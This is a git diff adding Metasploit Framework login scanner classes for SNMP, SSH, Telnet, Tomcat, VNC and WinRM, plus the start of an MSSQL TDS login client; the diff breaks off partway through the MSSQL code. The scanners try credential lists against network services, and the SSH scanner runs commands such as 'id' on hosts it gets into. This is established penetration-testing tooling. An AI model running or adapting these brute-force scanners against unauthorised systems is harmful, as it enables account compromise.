new file mode 100644
index 0000000000..1972f29aef
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/snmp.rb
@@ -0,0 +1,106 @@
+require 'snmp'
+require 'metasploit/framework/login_scanner/base'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with SNMP.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class SNMP
+        include Metasploit::Framework::LoginScanner::Base
+
+        DEFAULT_PORT         = 161
+        LIKELY_PORTS         = [ 161, 162 ]
+        LIKELY_SERVICE_NAMES = [ 'snmp' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attmpt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          [:SNMPv1, :SNMPv2c].each do |version|
+            snmp_client = ::SNMP::Manager.new(
+                :Host      => host,
+                :Port      => port,
+                :Community => credential.public,
+                :Version => version,
+                :Timeout => connection_timeout,
+                :Retries => 2,
+                :Transport => ::SNMP::RexUDPTransport,
+                :Socket => ::Rex::Socket::Udp.create
+            )
+
+            result_options[:proof] = test_read_access(snmp_client)
+            if result_options[:proof].nil?
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            else
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+              if has_write_access?(snmp_client, result_options[:proof])
+                result_options[:access_level] = "read-write"
+              else
+                result_options[:access_level] = "read-only"
+              end
+            end
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # This method takes an snmp client and tests whether
+        # it has write access to the remote system. It sets the
+        # the sysDescr oid to the same value we already read.
+        # @param snmp_client [SNMP::Manager] The SNMP client to use
+        # @param value [String] the value to set sysDescr back to
+        # @return [Boolean] Returns true or false for if we have write access
+        def has_write_access?(snmp_client, value)
+          var_bind = ::SNMP::VarBind.new("1.3.6.1.2.1.1.1.0", ::SNMP::OctetString.new(value))
+          begin
+            resp = snmp_client.set(var_bind)
+            if resp.error_status == :noError
+              return true
+            end
+          rescue RuntimeError
+            return false
+          end
+
+        end
+
+        # Sets the connection timeout approrpiately for SNMP
+        # if the user did not set it.
+        def set_sane_defaults
+          self.connection_timeout = 2 if self.connection_timeout.nil?
+          self.port = DEFAULT_PORT if self.port.nil?
+        end
+
+        # This method takes an snmp client and tests whether
+        # it has read access to the remote system. It checks
+        # the sysDescr oid to use as proof
+        # @param snmp_client [SNMP::Manager] The SNMP client to use
+        # @return [String, nil] Returns a string if successful, nil if failed
+        def test_read_access(snmp_client)
+          proof = nil
+          begin
+            resp = snmp_client.get("sysDescr.0")
+            resp.each_varbind { |var| proof = var.value }
+          rescue RuntimeError
+            proof = nil
+          end
+          proof
+        end
+
+
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/ssh.rb b/lib/metasploit/framework/login_scanner/ssh.rb
new file mode 100644
index 0000000000..d35e03c08b
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/ssh.rb
@@ -0,0 +1,134 @@
+require 'net/ssh'
+require 'metasploit/framework/login_scanner/base'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with the Secure Shell protocol.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      #
+      class SSH
+        include Metasploit::Framework::LoginScanner::Base
+
+        #
+        # CONSTANTS
+        #
+
+        CAN_GET_SESSION      = true
+        DEFAULT_PORT         = 22
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'ssh' ]
+        PRIVATE_TYPES        = [ :password, :ssh_key ]
+        REALM_KEY            = nil
+
+        VERBOSITIES = [
+            :debug,
+            :info,
+            :warn,
+            :error,
+            :fatal
+        ]
+        # @!attribute ssh_socket
+        #   @return [Net::SSH::Connection::Session] The current SSH connection
+        attr_accessor :ssh_socket
+        # @!attribute verbosity
+        #   The verbosity level for the SSH client.
+        #
+        #   @return [Symbol] An element of {VERBOSITIES}.
+        attr_accessor :verbosity
+
+        validates :verbosity,
+          presence: true,
+          inclusion: { in: VERBOSITIES }
+
+        # (see {Base#attempt_login})
+        # @note The caller *must* close {#ssh_socket}
+        def attempt_login(credential)
+          self.ssh_socket = nil
+          opt_hash = {
+            :port          => port,
+            :disable_agent => true,
+            :config        => false,
+            :verbose       => verbosity,
+            :proxies       => proxies
+          }
+          case credential.private_type
+          when :password, nil
+            opt_hash.update(
+              :auth_methods  => ['password','keyboard-interactive'],
+              :password      => credential.private,
+            )
+          when :ssh_key
+            opt_hash.update(
+              :auth_methods  => ['publickey'],
+              :key_data      => credential.private,
+            )
+          end
+
+          result_options = {
+            credential: credential
+          }
+          begin
+            ::Timeout.timeout(connection_timeout) do
+              self.ssh_socket = Net::SSH.start(
+                host,
+                credential.public,
+                opt_hash
+              )
+            end
+          rescue ::EOFError, Net::SSH::Disconnect, Rex::AddressInUse, Rex::ConnectionError, ::Timeout::Error
+            result_options.merge!( proof: nil, status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          rescue Net::SSH::Exception
+            result_options.merge!( proof: nil, status: Metasploit::Model::Login::Status::INCORRECT)
+          end
+
+          unless result_options.has_key? :status
+            if ssh_socket
+              proof = gather_proof
+              result_options.merge!( proof: proof, status: Metasploit::Model::Login::Status::SUCCESSFUL)
+            else
+              result_options.merge!( proof: nil, status: Metasploit::Model::Login::Status::INCORRECT)
+            end
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # This method attempts to gather proof that we successfuly logged in.
+        # @return [String] The proof of a connection, May be empty.
+        def gather_proof
+          proof = ''
+          begin
+            Timeout.timeout(5) do
+              proof = ssh_socket.exec!("id\n").to_s
+              if(proof =~ /id=/)
+                proof << ssh_socket.exec!("uname -a\n").to_s
+              else
+                # Cisco IOS
+                if proof =~ /Unknown command or computer name/
+                  proof = ssh_socket.exec!("ver\n").to_s
+                else
+                  proof << ssh_socket.exec!("help\n?\n\n\n").to_s
+                end
+              end
+            end
+          rescue ::Exception
+          end
+          proof
+        end
+
+        def set_sane_defaults
+          self.connection_timeout = 30 if self.connection_timeout.nil?
+          self.port = DEFAULT_PORT if self.port.nil?
+          self.verbosity = :fatal if self.verbosity.nil?
+        end
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/telnet.rb b/lib/metasploit/framework/login_scanner/telnet.rb
new file mode 100644
index 0000000000..b36b83496f
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/telnet.rb
@@ -0,0 +1,113 @@
+require 'metasploit/framework/telnet/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with Telnet remote terminals.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class Telnet
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Telnet::Client
+
+        CAN_GET_SESSION      = true
+        DEFAULT_PORT         = 23
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'telnet' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # @!attribute verbosity
+        #   The timeout to wait for the telnet banner.
+        #
+        #   @return [Fixnum]
+        attr_accessor :banner_timeout
+        # @!attribute verbosity
+        #   The timeout to wait for the response from a telnet command.
+        #
+        #   @return [Fixnum]
+        attr_accessor :telnet_timeout
+
+        validates :banner_timeout,
+                  presence: true,
+                  numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 1
+                  }
+
+        validates :telnet_timeout,
+                  presence: true,
+                  numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 1
+                  }
+
+        # (see {Base#attempt_login})
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          if connect_reset_safe == :refused
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          else
+            if busy_message?
+              self.sock.close unless self.sock.closed?
+              result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            end
+          end
+
+          unless result_options[:status]
+            unless password_prompt?
+              send_user(credential.public)
+            end
+
+            recvd_sample = @recvd.dup
+            # Allow for slow echos
+            1.upto(10) do
+              recv_telnet(self.sock, 0.10) unless @recvd.nil? or @recvd[/#{@password_prompt}/]
+            end
+
+            if password_prompt?(credential.public)
+              send_pass(credential.private)
+
+              # Allow for slow echos
+              1.upto(10) do
+                recv_telnet(self.sock, 0.10) if @recvd == recvd_sample
+              end
+            end
+
+            if login_succeeded?
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            else
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            end
+
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.max_send_size      ||= 0
+          self.port               ||= DEFAULT_PORT
+          self.send_delay         ||= 0
+          self.banner_timeout     ||= 25
+          self.telnet_timeout     ||= 10
+          self.connection_timeout ||= 30
+          # Shim to set up the ivars from the old Login mixin
+          create_login_ivars
+        end
+
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/tomcat.rb b/lib/metasploit/framework/login_scanner/tomcat.rb
new file mode 100644
index 0000000000..c773af7058
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/tomcat.rb
@@ -0,0 +1,28 @@
+
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # Tomcat Manager login scanner
+      class Tomcat < HTTP
+
+        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
+        CAN_GET_SESSION = true
+        DEFAULT_PORT    = 8180
+        PRIVATE_TYPES   = [ :password ]
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.uri = "/manager/html" if self.uri.nil?
+          self.method = "GET" if self.method.nil?
+
+          super
+        end
+
+      end
+    end
+  end
+end
+
diff --git a/lib/metasploit/framework/login_scanner/vnc.rb b/lib/metasploit/framework/login_scanner/vnc.rb
new file mode 100644
index 0000000000..038ee9ffc3
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/vnc.rb
@@ -0,0 +1,122 @@
+require 'metasploit/framework/tcp/client'
+require 'rex/proto/rfb'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # This is the LoginScanner class for dealing with the VNC RFB protocol.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class VNC
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+
+        #
+        # CONSTANTS
+        #
+
+        LIKELY_PORTS         = (5900..5910).to_a
+        LIKELY_SERVICE_NAMES = [ 'vnc' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # Error indicating retry should occur for UltraVNC
+        ULTRA_VNC_RETRY_ERROR = 'connection has been rejected'
+        # Error indicating retry should occur for VNC 4 Server
+        VNC4_SERVER_RETRY_ERROR = 'Too many security failures'
+        # Known retry errors for all supported versions of VNC
+        RETRY_ERRORS = [
+            ULTRA_VNC_RETRY_ERROR,
+            VNC4_SERVER_RETRY_ERROR
+        ]
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attmpt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          begin
+            # Make our initial socket to the target
+            disconnect if self.sock
+            connect
+
+            # Create our VNC client overtop of the socket
+            vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
+
+
+            if vnc.handshake
+              if vnc_auth(vnc,credential.private)
+                result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+              else
+                result_options.merge!(
+                  proof: vnc.error,
+                  status: Metasploit::Model::Login::Status::INCORRECT
+                )
+              end
+            else
+              result_options.merge!(
+                proof: vnc.error,
+                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+              )
+            end
+          rescue ::EOFError, Errno::ENOTCONN, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
+            result_options.merge!(
+                proof: e.message,
+                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # Check the VNC error to see if we should wait and retry.
+        #
+        # @param error [String] The VNC error message received
+        # @return [false] don't retry
+        # @return [true] retry
+        def retry?(error)
+          RETRY_ERRORS.include?(error)
+        end
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= 5900
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+        end
+
+        # This method attempts the actual VNC authentication. It has built in retries to handle
+        # delays built into the VNC RFB authentication.
+        # @param client [Rex::Proto::RFB::Client] The VNC client object to authenticate through
+        # @param password [String] the password to attempt the authentication with
+        def vnc_auth(client,password)
+          success = false
+          5.times do |n|
+            if client.authenticate(password)
+              success = true
+              break
+            end
+            break unless retry?(client.error)
+
+            # Wait for an increasing ammount of time before retrying
+            delay = (2**(n+1)) + 1
+            ::Rex.sleep(delay)
+          end
+          success
+        end
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/winrm.rb b/lib/metasploit/framework/login_scanner/winrm.rb
new file mode 100644
index 0000000000..af079b262e
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/winrm.rb
@@ -0,0 +1,52 @@
+
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # Windows Remote Management login scanner
+      class WinRM < HTTP
+
+        # The default port where WinRM listens. This is what you get on
+        # v1.1+ with `winrm quickconfig`. Note that before v1.1, the
+        # default was 80
+        DEFAULT_PORT = 5985
+
+        # The default realm is WORKSTATION which tells Windows authentication
+        # that it is a Local Account.
+        DEFAULT_REALM = 'WORKSTATION'
+
+        # The default port where WinRM listens when SSL is enabled. Note
+        # that before v1.1, the default was 443
+        DEFAULT_SSL_PORT = 5986
+
+        PRIVATE_TYPES = [ :password ]
+        LIKELY_PORTS  = [ 80, 443, 5985, 5986 ]
+        REALM_KEY     = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+        # Inherit LIKELY_SERVICE_NAMES, since a scanner will see it as
+        # just HTTP.
+
+        validates :method, inclusion: { in: ["POST"] }
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.uri = "/wsman" if self.uri.nil?
+          @method = "POST".freeze
+
+          super
+        end
+
+        # The method *must* be "POST", so don't let the user change it
+        # @raise [RuntimeError] Unconditionally
+        def method=(_)
+          raise RuntimeError, "Method must be POST for WinRM"
+        end
+
+      end
+    end
+  end
+end
+
diff --git a/lib/metasploit/framework/mssql/client.rb b/lib/metasploit/framework/mssql/client.rb
new file mode 100644
index 0000000000..2e1f21fac1
--- /dev/null
+++ b/lib/metasploit/framework/mssql/client.rb
@@ -0,0 +1,728 @@
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module MSSQL
+
+      module Client
+        include Metasploit::Framework::Tcp::Client
+
+        NTLM_CRYPT = Rex::Proto::NTLM::Crypt
+        NTLM_CONST = Rex::Proto::NTLM::Constants
+        NTLM_UTILS = Rex::Proto::NTLM::Utils
+        NTLM_XCEPT = Rex::Proto::NTLM::Exceptions
+
+        # Encryption
+        ENCRYPT_OFF     = 0x00 #Encryption is available but off.
+        ENCRYPT_ON      = 0x01 #Encryption is available and on.
+        ENCRYPT_NOT_SUP = 0x02 #Encryption is not available.
+        ENCRYPT_REQ     = 0x03 #Encryption is required.
+
+        # Packet Type
+        TYPE_SQL_BATCH 		               = 1 # (Client) SQL command
+        TYPE_PRE_TDS7_LOGIN	             = 2 # (Client) Pre-login with version < 7 (unused)
+        TYPE_RPC		                     = 3 # (Client) RPC
+        TYPE_TABLE_RESPONSE	             = 4 # (Server)  Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters,
+        # Request Completion, Error and Info Messages, Attention Acknowledgement
+        TYPE_ATTENTION_SIGNAL	           = 6 # (Client) Attention
+        TYPE_BULK_LOAD		               = 7 # (Client) SQL Command with binary data
+        TYPE_TRANSACTION_MANAGER_REQUEST = 14 # (Client) Transaction request manager
+        TYPE_TDS7_LOGIN 	               = 16 # (Client) Login
+        TYPE_SSPI_MESSAGE 	             = 17 # (Client) Login
+        TYPE_PRE_LOGIN_MESSAGE 	         = 18 # (Client) pre-login with version > 7
+
+        # Status
+        STATUS_NORMAL 		= 0x00
+        STATUS_END_OF_MESSAGE 	= 0x01
+        STATUS_IGNORE_EVENT	= 0x02
+        STATUS_RESETCONNECTION 	= 0x08 # TDS 7.1+
+        STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+
+
+        #
+        # This method connects to the server over TCP and attempts
+        # to authenticate with the supplied username and password
+        # The global socket is used and left connected after auth
+        #
+        def mssql_login(user='sa', pass='', db='', domain_name='')
+
+          disconnect if self.sock
+          connect
+
+          # Send a prelogin packet and check that encryption is not enabled
+          if mssql_prelogin() != ENCRYPT_NOT_SUP
+            print_error("Encryption is not supported")
+            return false
+          end
+
+          if windows_authentication
+            idx = 0
+            pkt = ''
+            pkt_hdr = ''
+            pkt_hdr =	[
+                TYPE_TDS7_LOGIN, #type
+                STATUS_END_OF_MESSAGE, #status
+                0x0000, #length
+                0x0000, # SPID
+                0x01, 	# PacketID (unused upon specification
+                # but ms network monitor stil prefer 1 to decode correctly, wireshark don't care)
+                0x00 	#Window
+            ]
+
+            pkt << [
+                0x00000000,   # Size
+                0x71000001,   # TDS Version
+                0x00000000,   # Dummy Size
+                0x00000007,   # Version
+                rand(1024+1), # PID
+                0x00000000,   # ConnectionID
+                0xe0,         # Option Flags 1
+                0x83,         # Option Flags 2
+                0x00,         # SQL Type Flags
+                0x00,         # Reserved Flags
+                0x00000000,   # Time Zone
+                0x00000000    # Collation
+            ].pack('VVVVVVCCCCVV')
+
+            cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
+            aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
+            sname = Rex::Text.to_unicode( rhost )
+            dname = Rex::Text.to_unicode( db )
+
+            ntlm_options = {
+                :signing 		=> false,
+                :usentlm2_session 	=> use_ntlm2_session,
+                :use_ntlmv2 		=> use_ntlmv2,
+                :send_lm 		=> send_lm,
+                :send_ntlm		=> send_ntlm
+            }
+
+            ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
+            workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+
+            ntlmsspblob = NTLM_UTILS::make_ntlmssp_blob_init(domain_name, workstation_name, ntlmssp_flags)
+
+            idx = pkt.size + 50 # lengths below
+
+            pkt << [idx, cname.length / 2].pack('vv')
+            idx += cname.length
+
+            pkt << [0, 0].pack('vv') # User length offset must be 0
+            pkt << [0, 0].pack('vv') # Password length offset must be 0
+
+            pkt << [idx, aname.length / 2].pack('vv')
+            idx += aname.length
+
+            pkt << [idx, sname.length / 2].pack('vv')
+            idx += sname.length
+
+            pkt << [0, 0].pack('vv') # unused
+
+            pkt << [idx, aname.length / 2].pack('vv')
+            idx += aname.length
+
+            pkt << [idx, 0].pack('vv') # locales
+
+            pkt << [idx, 0].pack('vv') #db
+
+            # ClientID (should be mac address)
+            pkt << Rex::Text.rand_text(6)
+
+            # NTLMSSP
+            pkt << [idx, ntlmsspblob.length].pack('vv')
+            idx += ntlmsspblob.length
+
+            pkt << [idx, 0].pack('vv') # AtchDBFile
+
+            pkt << cname
+            pkt << aname
+            pkt << sname
+            pkt << aname
+            pkt << ntlmsspblob
+
+            # Total packet length
+            pkt[0,4] = [pkt.length].pack('V')
+
+            pkt_hdr[2]	= 	pkt.length + 8
+
+            pkt = pkt_hdr.pack("CCnnCC") + pkt
+
+            # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
+            # has a strange behavior that differs from the specifications
+            # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
+            # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
+            resp = mssql_send_recv(pkt,15, false)
+
+            # Get default data
+            begin
+              blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(resp)
+                # a domain.length < 3 will hit this
+            rescue NTLM_XCEPT::NTLMMissingChallenge
+              return false
+            end
+
+            challenge_key        = blob_data[:challenge_key]
+            server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
+            #netbios name
+            default_name         =  blob_data[:default_name] || ''
+            #netbios domain
+            default_domain       = blob_data[:default_domain] || ''
+            #dns name
+            dns_host_name        =  blob_data[:dns_host_name] || ''
+            #dns domain
+            dns_domain_name      =  blob_data[:dns_domain_name] || ''
+            #Client time
+            chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
+
+            spnopt = {:use_spn => send_spn, :name =>  self.rhost}
+
+            resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(user, pass, challenge_key,
+                                                                                                           domain_name, default_name, default_domain,
+                                                                                                           dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
+                                                                                                           spnopt, ntlm_options)
+
+            ntlmssp = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, user, resp_lm, resp_ntlm, '', ntlmssp_flags)
+
+            # Create an SSPIMessage
+            idx = 0
+            pkt = ''
+            pkt_hdr = ''
+            pkt_hdr =	[
+                TYPE_SSPI_MESSAGE, #type
+                STATUS_END_OF_MESSAGE, #status
+                0x0000, #length
+                0x0000, # SPID
+                0x01, # PacketID
+                0x00 #Window
+            ]
+
+            pkt_hdr[2]	= 	ntlmssp.length + 8
+
+            pkt = pkt_hdr.pack("CCnnCC") + ntlmssp
+
+            resp = mssql_send_recv(pkt)
+
+
+            #SQL Server Authentification
+          else
+            idx = 0
+            pkt = ''
+            pkt << [
+                0x00000000,   # Dummy size
+
+                0x71000001,   # TDS Version
+                0x00000000,   # Size
+                0x00000007,   # Version
+                rand(1024+1), # PID
+                0x00000000,   # ConnectionID
+                0xe0,         # Option Flags 1
+                0x03,         # Option Flags 2
+                0x00,         # SQL Type Flags
+                0x00,         # Reserved Flags
+                0x00000000,   # Time Zone
+                0x00000000    # Collation
+            ].pack('VVVVVVCCCCVV')
+
+
+            cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
+            uname = Rex::Text.to_unicode( user )
+            pname = mssql_tds_encrypt( pass )
+            aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
+            sname = Rex::Text.to_unicode( rhost )
+            dname = Rex::Text.to_unicode( db )
+
+            idx = pkt.size + 50 # lengths below
+
+            pkt << [idx, cname.length / 2].pack('vv')
+            idx += cname.length
+
+            pkt << [idx, uname.length / 2].pack('vv')
+            idx += uname.length
+
+            pkt << [idx, pname.length / 2].pack('vv')
+            idx += pname.length
+
+            pkt << [idx, aname.length / 2].pack('vv')
+            idx += aname.length
+
+            pkt << [idx, sname.length / 2].pack('vv')
+            idx += sname.length
+
+            pkt << [0, 0].pack('vv')
+
+            pkt << [idx, aname.length / 2].pack('vv')
+            idx += aname.length
+
+            pkt << [idx, 0].pack('vv')
+
+            pkt << [idx, dname.length / 2].pack('vv')
+            idx += dname.length
+
+            # The total length has to be embedded twice more here
+            pkt << [
+                0,
+                0,
+                0x12345678,
+                0x12345678
+            ].pack('vVVV')
+
+            pkt << cname
+            pkt << uname
+            pkt << pname
+            pkt << aname
+            pkt << sname
+            pkt << aname
+            pkt << dname
+
+            # Total packet length
+            pkt[0,4] = [pkt.length].pack('V')
+
+            # Embedded packet lengths
+            pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
+
+            # Packet header and total length including header
+            pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
+
+            resp = mssql_send_recv(pkt)
+
+          end
+
+          info = {:errors => []}
+          info = mssql_parse_reply(resp,info)
+
+          return false if not info
+          info[:login_ack] ? true : false
+        end
+
+        #
+        # Parse an "environment change" TDS token
+        #
+        def mssql_parse_env(data, info)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)
+          type = buff.slice!(0,1).unpack('C')[0]
+
+          nval = ''
+          nlen = buff.slice!(0,1).unpack('C')[0] || 0
+          nval = buff.slice!(0,nlen*2).gsub("\x00", '') if nlen > 0
+
+          oval = ''
+          olen = buff.slice!(0,1).unpack('C')[0] || 0
+          oval = buff.slice!(0,olen*2).gsub("\x00", '') if olen > 0
+
+          info[:envs] ||= []
+          info[:envs] << { :type => type, :old => oval, :new => nval }
+          info
+        end
+
+        #
+        # Parse a "ret" TDS token
+        #
+        def mssql_parse_ret(data, info)
+          ret = data.slice!(0,4).unpack('N')[0]
+          info[:ret] = ret
+          info
+        end
+
+        #
+        # Parse a "done" TDS token
+        #
+        def mssql_parse_done(data, info)
+          status,cmd,rows = data.slice!(0,8).unpack('vvV')
+          info[:done] = { :status => status, :cmd => cmd, :rows => rows }
+          info
+        end
+
+        #
+        # Parse an "error" TDS token
+        #
+        def mssql_parse_error(data, info)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)
+
+          errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv')
+          emsg = buff.slice!(0,elen * 2)
+          emsg.gsub!("\x00", '')
+
+          info[:errors] << "SQL Server Error ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
+          info
+        end
+
+        #
+        # Parse an "information" TDS token
+        #
+        def mssql_parse_info(data, info)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)
+
+          errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv')
+          emsg = buff.slice!(0,elen * 2)
+          emsg.gsub!("\x00", '')
+
+          info[:infos]||= []
+          info[:infos] << "SQL Server Info ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
+          info
+        end
+
+        #
+        # Parse a "login ack" TDS token
+        #
+        def mssql_parse_login_ack(data, info)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)
+          info[:login_ack] = true
+        end
+
+        #
+        # Parse individual tokens from a TDS reply
+        #
+        def mssql_parse_reply(data, info)
+          info[:errors] = []
+          return if not data
+          until data.empty?
+            token = data.slice!(0,1).unpack('C')[0]
+            case token
+              when 0x81
+                mssql_parse_tds_reply(data, info)
+              when 0xd1
+                mssql_parse_tds_row(data, info)
+              when 0xe3
+                mssql_parse_env(data, info)
+              when 0x79
+                mssql_parse_ret(data, info)
+              when 0xfd, 0xfe, 0xff
+                mssql_parse_done(data, info)
+              when 0xad
+                mssql_parse_login_ack(data, info)
+              when 0xab
+                mssql_parse_info(data, info)
+              when 0xaa
+                mssql_parse_error(data, info)
+              when nil
+                break
+              else
+                info[:errors] << "unsupported token: #{token}"
+            end
+          end
+          info
+        end
+
+        #
+        # Parse a raw TDS reply from the server
+        #
+        def mssql_parse_tds_reply(data, info)
+          info[:errors] ||= []
+          info[:colinfos] ||= []
+          info[:colnames] ||= []
+
+          # Parse out the columns
+          cols = data.slice!(0,2).unpack('v')[0]
+          0.upto(cols-1) do |col_idx|
+            col = {}
+            info[:colinfos][col_idx] = col
+
+            col[:utype] = data.slice!(0,2).unpack('v')[0]
+            col[:flags] = data.slice!(0,2).unpack('v')[0]
+            col[:type]  = data.slice!(0,1).unpack('C')[0]
+
+            case col[:type]
+              when 48
+                col[:id] = :tinyint
+
+              when 52
+                col[:id] = :smallint
+
+              when 56
+                col[:id] = :rawint
+
+              when 61
+                col[:id] = :datetime
+
+              when 34
+                col[:id]            = :image
+                col[:max_size]      = data.slice!(0,4).unpack('V')[0]
+                col[:value_length]  = data.slice!(0,2).unpack('v')[0]
+                col[:value]         = data.slice!(0, col[:value_length]  * 2).gsub("\x00", '')
+
+              when 36
+                col[:id] = :string
+
+              when 38
+                col[:id] = :int
+                col[:int_size] = data.slice!(0,1).unpack('C')[0]
+
+              when 127
+                col[:id] = :bigint
+
+              when 165
+                col[:id] = :hex
+                col[:max_size] = data.slice!(0,2).unpack('v')[0]
+
+              when 173
+                col[:id] = :hex # binary(2)
+                col[:max_size] = data.slice!(0,2).unpack('v')[0]
+
+              when 231,175,167,239
+                col[:id] = :string
+                col[:max_size] = data.slice!(0,2).unpack('v')[0]
+                col[:codepage] = data.slice!(0,2).unpack('v')[0]
+                col[:cflags] = data.slice!(0,2).unpack('v')[0]
+                col[:charset_id] =  data.slice!(0,1).unpack('C')[0]
+
+              else
+                col[:id] = :unknown
+            end
+
+            col[:msg_len] = data.slice!(0,1).unpack('C')[0]
+
+            if(col[:msg_len] and col[:msg_len] > 0)
+              col[:name] = data.slice!(0, col[:msg_len] * 2).gsub("\x00", '')
+            end
